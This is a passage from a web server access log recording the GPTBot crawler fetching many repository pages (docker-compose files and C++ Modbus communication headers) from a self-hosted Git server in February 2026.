18128] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt" [Client 74.7.227.38] [Length 24886] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" +[17/Feb/2026:15:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12634] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" +[17/Feb/2026:15:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" +[17/Feb/2026:15:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" +[17/Feb/2026:15:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12506] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" +[17/Feb/2026:15:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12813] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11824] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12334] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11433] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11792] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13094] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10213] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11523] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10526] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12018] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12673] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11432] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11823] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 